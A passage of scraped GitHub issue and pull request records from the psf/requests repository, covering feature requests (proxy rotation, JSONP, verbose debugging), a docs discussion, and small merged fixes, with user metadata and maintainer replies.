@Lukasa and me. The solution is to find people who care about maintaining it and make it its own library. If you think this code is too small for a library on its own, consider the fact that many of the auth libraries (kerberos, ntlm, etc.) are all similar in size to this code and are all packaged separately.\n\n**tl;dr** We have no interest in making this a feature of the project or maintaining this code when the maintainers will not use it actively enough to be comfortable maintaining it.\n", "@sigmavirus24: Thanks for the detailed explanation!\n" ]
https://api.github.com/repos/psf/requests/issues/2354
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2354/labels{/name}
https://api.github.com/repos/psf/requests/issues/2354/comments
https://api.github.com/repos/psf/requests/issues/2354/events
https://github.com/psf/requests/issues/2354
49,920,234
MDU6SXNzdWU0OTkyMDIzNA==
2,354
is there any way to make requests waiting for ajax to respond?
{ "avatar_url": "https://avatars.githubusercontent.com/u/2675621?v=4", "events_url": "https://api.github.com/users/Casyfill/events{/privacy}", "followers_url": "https://api.github.com/users/Casyfill/followers", "following_url": "https://api.github.com/users/Casyfill/following{/other_user}", "gists_url": "https://api.github.com/users/Casyfill/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Casyfill", "id": 2675621, "login": "Casyfill", "node_id": "MDQ6VXNlcjI2NzU2MjE=", "organizations_url": "https://api.github.com/users/Casyfill/orgs", "received_events_url": "https://api.github.com/users/Casyfill/received_events", "repos_url": "https://api.github.com/users/Casyfill/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Casyfill/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Casyfill/subscriptions", "type": "User", "url": "https://api.github.com/users/Casyfill", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-11-24T17:48:44Z
2021-09-08T23:06:55Z
2014-11-24T17:51:34Z
NONE
resolved
a site (http://echo.msk.ru/) is responding to the request in a second. However, with a simple request.get I cant put a hand on the site content. For sure, I can use selenium for that, but is there any simple way to make requests wait for answer? thanks in advance
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2354/reactions" }
https://api.github.com/repos/psf/requests/issues/2354/timeline
null
completed
null
null
false
[ "requests does not wait for AJAX because it doesn't read HTML. You need something that will read the HTML of the site to learn where the Javascript is, then obtain it and execute it. requests is not built to do that, though it could be a _component_ of doing it.\n\nMy recommendation would be to use the browser developer tools to see if you can make the AJAX request yourself in a programmatic way.\n", "thanks, I got it. Yeah, I usually use Selenium lib for python to solve this\n" ]
https://api.github.com/repos/psf/requests/issues/2353
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2353/labels{/name}
https://api.github.com/repos/psf/requests/issues/2353/comments
https://api.github.com/repos/psf/requests/issues/2353/events
https://github.com/psf/requests/pull/2353
49849592
MDExOlB1bGxSZXF1ZXN0MjQ5MTA2MjI=
2353
url was already parsed, don't urlparse twice
{ "avatar_url": "https://avatars.githubusercontent.com/u/375744?v=4", "events_url": "https://api.github.com/users/mattrobenolt/events{/privacy}", "followers_url": "https://api.github.com/users/mattrobenolt/followers", "following_url": "https://api.github.com/users/mattrobenolt/following{/other_user}", "gists_url": "https://api.github.com/users/mattrobenolt/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/mattrobenolt", "id": 375744, "login": "mattrobenolt", "node_id": "MDQ6VXNlcjM3NTc0NA==", "organizations_url": "https://api.github.com/users/mattrobenolt/orgs", "received_events_url": "https://api.github.com/users/mattrobenolt/received_events", "repos_url": "https://api.github.com/users/mattrobenolt/repos", "site_admin": false, "starred_url": "https://api.github.com/users/mattrobenolt/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/mattrobenolt/subscriptions", "type": "User", "url": "https://api.github.com/users/mattrobenolt", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-11-24T01:54:56Z
2021-09-08T09:01:12Z
2014-11-30T19:11:52Z
CONTRIBUTOR
resolved
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2353/reactions" }
https://api.github.com/repos/psf/requests/issues/2353/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2353.diff", "html_url": "https://github.com/psf/requests/pull/2353", "merged_at": "2014-11-30T19:11:52Z", "patch_url": "https://github.com/psf/requests/pull/2353.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2353" }
true
[ "I think this is safe to take. @sigmavirus24?\n", "Looks safe to me\n", "cool :)\n" ]
https://api.github.com/repos/psf/requests/issues/2352
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2352/labels{/name}
https://api.github.com/repos/psf/requests/issues/2352/comments
https://api.github.com/repos/psf/requests/issues/2352/events
https://github.com/psf/requests/issues/2352
49789576
MDU6SXNzdWU0OTc4OTU3Ng==
2352
Clarity on docs regarding debugging
{ "avatar_url": "https://avatars.githubusercontent.com/u/651797?v=4", "events_url": "https://api.github.com/users/foxx/events{/privacy}", "followers_url": "https://api.github.com/users/foxx/followers", "following_url": "https://api.github.com/users/foxx/following{/other_user}", "gists_url": "https://api.github.com/users/foxx/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/foxx", "id": 651797, "login": "foxx", "node_id": "MDQ6VXNlcjY1MTc5Nw==", "organizations_url": "https://api.github.com/users/foxx/orgs", "received_events_url": "https://api.github.com/users/foxx/received_events", "repos_url": "https://api.github.com/users/foxx/repos", "site_admin": false, "starred_url": "https://api.github.com/users/foxx/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/foxx/subscriptions", "type": "User", "url": "https://api.github.com/users/foxx", "user_view_type": "public" }
[]
closed
true
null
[]
null
17
2014-11-22T13:08:47Z
2021-09-08T23:06:56Z
2014-11-23T22:46:19Z
NONE
resolved
After spending about 10 minutes figuring out how to log raw requests/responses in requests, I eventually came across the following [SO article](http://stackoverflow.com/questions/10588644/how-can-i-see-the-entire-http-request-thats-being-sent-by-my-python-application), which references an obscure part of the [documentation](http://docs.python-requests.org/en/master/api/?highlight=debuglevel). It would be nice if there were a clear section in the docs explaining how to do this, as it's not very obvious and took quite a bit of searching. A quick copy/paste (or a complete move) would suffice. Thoughts?
{ "avatar_url": "https://avatars.githubusercontent.com/u/651797?v=4", "events_url": "https://api.github.com/users/foxx/events{/privacy}", "followers_url": "https://api.github.com/users/foxx/followers", "following_url": "https://api.github.com/users/foxx/following{/other_user}", "gists_url": "https://api.github.com/users/foxx/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/foxx", "id": 651797, "login": "foxx", "node_id": "MDQ6VXNlcjY1MTc5Nw==", "organizations_url": "https://api.github.com/users/foxx/orgs", "received_events_url": "https://api.github.com/users/foxx/received_events", "repos_url": "https://api.github.com/users/foxx/repos", "site_admin": false, "starred_url": "https://api.github.com/users/foxx/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/foxx/subscriptions", "type": "User", "url": "https://api.github.com/users/foxx", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2352/reactions" }
https://api.github.com/repos/psf/requests/issues/2352/timeline
null
completed
null
null
false
[ "Using the search functionality with the phrase \"logging\" helped me find the section of the docs that details how to enable logging. I for one would rather not have the same content copied and pasted in the documentation because that provides two places where it would need to be updated and they will easily fall out of sync. My question then is, where do you think it would make most sense to move this to? \n", "Agreed on not duplicating instructions. I'm thinking a section in the \"quick start\" at the bottom, perhaps the title \"Debugging\" followed by a collection of all the tricks that can be used to enable the various levels of debugging. For other debugging recipes outside of basic logging usage, we could link to another page with the various recipes. Thoughts?\n", "I really don't think this belongs in the quickstart section frankly. It isn't something most people will need as soon as they start using requests. It's more of an advanced usage piece of information, but even then our Advanced section is already quite large and overloaded. I'm not entirely convinced this shouldn't be it's own section though. I'd love to see more of the recipes you think belong there before we do that though and I'd would **really** like @Lukasa's input when they have a minute or two to spare.\n", "Yeah ideally it just needs to be somewhere that can be easily found, because currently it's in an obscure place which is difficult to find. Perhaps \"troubleshooting\" or something like that... I'd argue that debugging requests/urllib3 is quite a tedious task, for example the logging approach dumps all the info but in a non human readable format... Recipes would be for showing how to dump info in a pretty format, for example request/response headers split with their new lines intact etc.\n", "I think the bigger problem here is that the SO answer isn't correct. Requests has _no_ way to dump the request exactly as it was sent on the wire. 
There are a number of layers in between the top and us, any of which are free to change the code as they please. `httplib` is the worst offender here, particularly with responses, which it parses before dumping them (so if they don't parse properly they won't get dumped properly either).\n\nI think a 'how to debug HTTP' article is a good idea, but it's not entirely clear to me that it belongs in our documentation. If we had it, however, I'd be recommending things like Wireshark/tcpdump, rather than logging. Don't trust what the application tells you it's sending, ask the OS instead.\n", "@Lukasa All good points. From the perspective of a new user who isn't aware of the architecture of requests, they just want a simple mechanism that will allow easy debugging without having to use wireshark filters, passive burp proxy etc. For example, when using `curl` you can use the `-v` option to dump all request data, something like that for requests would be more than sufficient. \n\nI'm wondering if it would be more appropriate to raise a feature request in `urllib3` for a simple session method, such as `verbose(True/False)` which then implements the necessary recipe to dump traffic data in a similar format as `curl -v`. If accepted, then we could implement a method on `requests.Session` that called the urllib3 verbose method.\n\nDoes that sound like a good way forward?\n", "No it doesn't sound like a good way forward. urllib3 doesn't need that parameter and we won't be expanding the Session API unnecessarily. I'm also rather perturbed that people find this so hard to find. If you find requests' docs and you search for \"logging\" you'll find that documentation quickly. It's not in the higher traffic parts of the docs, granted, but it's also not something I see a lot of people using very much.\n", "Right, I'm going to disagree with you there, and I'm also somewhat \"perturbed\" that you feel this would be unnecessary expansion. 
If you have already acknowledged that people are finding it difficult, then perhaps that would suggest something. Furthermore, the logging shown from `httplib` is also not very human readable and isn't easily useful (imho).\n\nI'm going to raise this in `urllib3` anyway, and see if the feedback is any different. \n\nThanks for the replies all!\n", "Cory's a maintainer there and I'm opposed to adding this to either our \nSesssion API or urllib3's PoolManager API, so you can create the issue but it \nisn't likely to progress very far.\n", "I'm fully aware of that, thanks.\n", "@sigmavirus24 Normally I don't bother commenting on rudeness, but I felt compelled to on this occasion because of my prior background with requests/urllib3. I really feel like your response was overly aggressive and borderline rude. I've never had this issue with any of the other core maintainers in the past, and I spent time specifically replying because they have always been polite and reasonable, even when rejecting my code or requests. This interaction has left me feeling like I no longer want to bother contributing towards either of those projects, your reaction/approach was completely unnecessary and similar in tone with the Django core developers poor bed side manner.\n\nSometimes things get rejected, and that's fine, but there's no need to be rude about it.\n", "Closing for now. For anyone in future, there has also been some discussion on this in https://github.com/shazow/urllib3/issues/107\n", "@foxx I'm sorry you felt that way. It's never our intention to create a hostile atmosphere, and I apologise unreservedly if that's what we did.\n\nThis is another of my 'wish list' features for a rewrite of `httplib`. If I ever find the time to do it, this will be a key tentpole of that rewrite.\n", "@Lukasa Thank you for the follow up, it's appreciated. 
Based on comments in those other issues and a quick inspection of the source, additional debugging support would _probably_ have to rely on monkey patching. Given that's not a great approach, I'd agree that a rewrite of `httplib` is sounding like the cleaner option. \n\nOut of curiosity, were you planning on keeping the `httplib` rewrite backwards compatible, or would it be `httplib2`?\n", "@foxx I wasn't trying to be rude just honest. If there's anything that annoys me most it's when people aren't fully honest in a way that would help me prevent wasting my time. If I'm mistaken about which comment offended you, let me know. It's no excuse but I'm typically in a rush and replying from my phone. I don't often have the luxury of re-reading things to make sure they won't come across as rude. I do hope you continue to contribute because your input is valuable. \n", "@sigmavirus24 I appreciate the follow up, thank you, and no hard feelings :)\n", "@foxx It would not be backwards compatible, but neither would it be `httplib2` (that already exists!). `httplib`'s API is _bad_, and it limits what can be done by libraries that build on top of it. I have ideas for where to go next, but again, no time. =(\n" ]
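The logging recipe debated in issue #2352 above (and tucked away in the requests API docs) boils down to two stdlib switches. A minimal sketch using Python 3's `http.client` (named `httplib` on Python 2); note the caveat from the thread still applies: this shows what the application thinks it sent, not the exact bytes on the wire.

```python
import logging
import http.client  # `httplib` on Python 2

# http.client echoes request headers and response status via print()
# once debuglevel is raised; requests/urllib3 sit on top of it.
http.client.HTTPConnection.debuglevel = 1

# Surface urllib3's own log records (connection pool activity, retries).
logging.basicConfig(level=logging.DEBUG)
logging.getLogger("urllib3").setLevel(logging.DEBUG)
```

With both switches set, a subsequent `requests.get(...)` prints the outgoing headers to stdout and urllib3's pool activity through the logging system.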
https://api.github.com/repos/psf/requests/issues/2351
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2351/labels{/name}
https://api.github.com/repos/psf/requests/issues/2351/comments
https://api.github.com/repos/psf/requests/issues/2351/events
https://github.com/psf/requests/pull/2351
49689412
MDExOlB1bGxSZXF1ZXN0MjQ4MzYwMjc=
2351
Added ability to use list of proxies for each scheme. Proxies are randomly selected.
{ "avatar_url": "https://avatars.githubusercontent.com/u/955888?v=4", "events_url": "https://api.github.com/users/lexapi/events{/privacy}", "followers_url": "https://api.github.com/users/lexapi/followers", "following_url": "https://api.github.com/users/lexapi/following{/other_user}", "gists_url": "https://api.github.com/users/lexapi/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/lexapi", "id": 955888, "login": "lexapi", "node_id": "MDQ6VXNlcjk1NTg4OA==", "organizations_url": "https://api.github.com/users/lexapi/orgs", "received_events_url": "https://api.github.com/users/lexapi/received_events", "repos_url": "https://api.github.com/users/lexapi/repos", "site_admin": false, "starred_url": "https://api.github.com/users/lexapi/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/lexapi/subscriptions", "type": "User", "url": "https://api.github.com/users/lexapi", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-11-21T12:15:25Z
2021-09-08T09:01:13Z
2014-11-25T03:06:12Z
NONE
resolved
Basic Usage: ``` python import requests r = requests.Session() p = {'http':['proxy1.com:81', 'proxy2:82', 'proxy2:82'], 'https': 'proxy4.com'} r.proxies = p print r.get('http://ya.ru') print r.get('http://google.com') print requests.get('http://ya.ru', proxies=p) print r.get('https://www.google.ru') print requests.get('https://www.google.ru') ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2351/reactions" }
https://api.github.com/repos/psf/requests/issues/2351/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2351.diff", "html_url": "https://github.com/psf/requests/pull/2351", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2351.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2351" }
true
[ "I'm not sure I understand how this is supposed to work.\n", "Currently, we are can use only one proxy for scheme, but some sites have limits on the number of requests from 1 IP (per second, minutes, etc)\nIf we make a spider for the site - we will have big problems (\nThis function allows you to immediately set large list of proxies for the scheme(protocol) and use random for each request (without code changes).\nExample without it this changes:\n\n``` python\nimport requests\nimport random\nr = requests.Session()\np = {'http':random.choice(['proxy1.com:81', 'proxy2:82', 'proxy2:82']), 'https': 'proxy4.com'}\nr.proxies = p\nprint r.get('http://ya.ru')\n# we are must change proxy for next request\np['http'] = random.choice(['proxy1.com:81', 'proxy2:82', 'proxy2:82'])\nr.proxies = p\nprint r.get('http://ya.ru')\n```\n", "So no one has ever requested this before and I haven't found anyone else searching for this on stackoverflow. Given that this is such a niché feature, we won't be accepting this. The good thing is that you already have the code to make this work (for the most part). What you want is a class that's either subclasses `dict` or `collections.MutableMapping`. It will contain allow us to do `.get('http://')` for example and the class will give us one value that you choose to give us.\n", "Thanks for the answer. I just proposed a variant)\n" ]
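The dict subclass suggested in the closing comment of issue #2351 above might look like the following. `RotatingProxyMap` is a hypothetical name, not anything requests ships, and since `Session` settings get merged internally (which can flatten the subclass back to a plain dict), passing the mapping per request via `proxies=` is the safer way to keep the random-choice behaviour; treat this as a sketch of the idea rather than a drop-in.

```python
import random

class RotatingProxyMap(dict):
    """Mapping whose values may be lists; each lookup picks one at random.

    Hypothetical illustration of the dict-subclass idea from the thread.
    """

    def __getitem__(self, key):
        value = super(RotatingProxyMap, self).__getitem__(key)
        if isinstance(value, list):
            # Draw a fresh proxy for this lookup.
            return random.choice(value)
        return value

    def get(self, key, default=None):
        # Route .get() through __getitem__ so it also rotates.
        try:
            return self[key]
        except KeyError:
            return default
```

Usage would then resemble `requests.get('http://ya.ru', proxies=RotatingProxyMap({'http': ['proxy1.com:81', 'proxy2.com:82'], 'https': 'proxy4.com'}))`.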
https://api.github.com/repos/psf/requests/issues/2350
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2350/labels{/name}
https://api.github.com/repos/psf/requests/issues/2350/comments
https://api.github.com/repos/psf/requests/issues/2350/events
https://github.com/psf/requests/issues/2350
49,639,244
MDU6SXNzdWU0OTYzOTI0NA==
2,350
JSONP support
{ "avatar_url": "https://avatars.githubusercontent.com/u/9846444?v=4", "events_url": "https://api.github.com/users/gtlhc/events{/privacy}", "followers_url": "https://api.github.com/users/gtlhc/followers", "following_url": "https://api.github.com/users/gtlhc/following{/other_user}", "gists_url": "https://api.github.com/users/gtlhc/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/gtlhc", "id": 9846444, "login": "gtlhc", "node_id": "MDQ6VXNlcjk4NDY0NDQ=", "organizations_url": "https://api.github.com/users/gtlhc/orgs", "received_events_url": "https://api.github.com/users/gtlhc/received_events", "repos_url": "https://api.github.com/users/gtlhc/repos", "site_admin": false, "starred_url": "https://api.github.com/users/gtlhc/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/gtlhc/subscriptions", "type": "User", "url": "https://api.github.com/users/gtlhc", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-21T00:58:18Z
2021-09-08T23:06:56Z
2014-11-21T01:17:30Z
NONE
resolved
Add JSONP support for the Response: code: jp=r.content qi=jp.index('(') callback=jp[:qi] data=jp[qi+1:-1] return callback,data usage: r.jsonp.callback #string r.jsonp.data #json
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2350/reactions" }
https://api.github.com/repos/psf/requests/issues/2350/timeline
null
completed
null
null
false
[ "We're not accepting new features any longer unless there's an extremely compelling usecase. Thanks for the suggestion though! \n" ]
https://api.github.com/repos/psf/requests/issues/2349
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2349/labels{/name}
https://api.github.com/repos/psf/requests/issues/2349/comments
https://api.github.com/repos/psf/requests/issues/2349/events
https://github.com/psf/requests/pull/2349
49179140
MDExOlB1bGxSZXF1ZXN0MjQ1ODc5MDE=
2349
Properly serialize RecentlyUsedContainers for cache
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "009800", "default": false, "description": null, "id": 44501218, "name": "Ready To Merge", "node_id": "MDU6TGFiZWw0NDUwMTIxOA==", "url": "https://api.github.com/repos/psf/requests/labels/Ready%20To%20Merge" }, { "color": "207de5", "default": false, "description": null, "id": 60620163, "name": "Minion Seal of Approval", "node_id": "MDU6TGFiZWw2MDYyMDE2Mw==", "url": "https://api.github.com/repos/psf/requests/labels/Minion%20Seal%20of%20Approval" } ]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" } ]
null
3
2014-11-18T04:18:55Z
2021-09-08T09:01:12Z
2014-11-30T19:12:43Z
CONTRIBUTOR
resolved
RecentlyUsedContainers are threadsafe, so they hold a lock and as such cannot be serialized with pickle directly. To handle this, we need to convert the container to a dictionary first, and back again when deserializing. Fixes #2345
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2349/reactions" }
https://api.github.com/repos/psf/requests/issues/2349/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2349.diff", "html_url": "https://github.com/psf/requests/pull/2349", "merged_at": "2014-11-30T19:12:43Z", "patch_url": "https://github.com/psf/requests/pull/2349.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2349" }
true
[ "looks good! any way to add a test exposing this issue?\n", "> any way to add a test exposing this issue?\n\nBesides the test that failed in the first place? Jenkins isn't running for a reason only @kennethreitz can determine. Had @Lukasa or I been running the tests locally before approving PRs, it probably wouldn't have reached this point.\n", "+1 LGTM.\n" ]
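The fix described for issue #2349 above is an instance of the standard `__getstate__`/`__setstate__` pattern for pickling objects that hold locks: serialize the plain payload, drop the lock, and recreate it on load. `LockedCache` below is an illustrative stand-in, not the real urllib3 `RecentlyUsedContainer`.

```python
import pickle
import threading

class LockedCache:
    """Illustrative stand-in for a lock-protected container; the real
    fix applies the same idea to urllib3's RecentlyUsedContainer."""

    def __init__(self, data=None):
        self._data = dict(data or {})
        self._lock = threading.RLock()  # lock objects cannot be pickled

    def __getstate__(self):
        # Serialize only the plain-dict payload, dropping the lock.
        return {"_data": self._data}

    def __setstate__(self, state):
        self._data = state["_data"]
        self._lock = threading.RLock()  # recreate a fresh lock on load

cache = LockedCache({"https://example.com": "pool"})
restored = pickle.loads(pickle.dumps(cache))
```

Without `__getstate__`, `pickle.dumps(cache)` would raise a `TypeError` when it reached the lock.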
https://api.github.com/repos/psf/requests/issues/2348
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2348/labels{/name}
https://api.github.com/repos/psf/requests/issues/2348/comments
https://api.github.com/repos/psf/requests/issues/2348/events
https://github.com/psf/requests/pull/2348
49072887
MDExOlB1bGxSZXF1ZXN0MjQ1MjY5NDc=
2348
Docs: Add more section labels for referencing
{ "avatar_url": "https://avatars.githubusercontent.com/u/434495?v=4", "events_url": "https://api.github.com/users/danmichaelo/events{/privacy}", "followers_url": "https://api.github.com/users/danmichaelo/followers", "following_url": "https://api.github.com/users/danmichaelo/following{/other_user}", "gists_url": "https://api.github.com/users/danmichaelo/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/danmichaelo", "id": 434495, "login": "danmichaelo", "node_id": "MDQ6VXNlcjQzNDQ5NQ==", "organizations_url": "https://api.github.com/users/danmichaelo/orgs", "received_events_url": "https://api.github.com/users/danmichaelo/received_events", "repos_url": "https://api.github.com/users/danmichaelo/repos", "site_admin": false, "starred_url": "https://api.github.com/users/danmichaelo/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/danmichaelo/subscriptions", "type": "User", "url": "https://api.github.com/users/danmichaelo", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-17T10:42:33Z
2021-09-08T09:01:12Z
2014-11-30T19:12:04Z
CONTRIBUTOR
resolved
so sections can be linked from other projects using Intersphinx
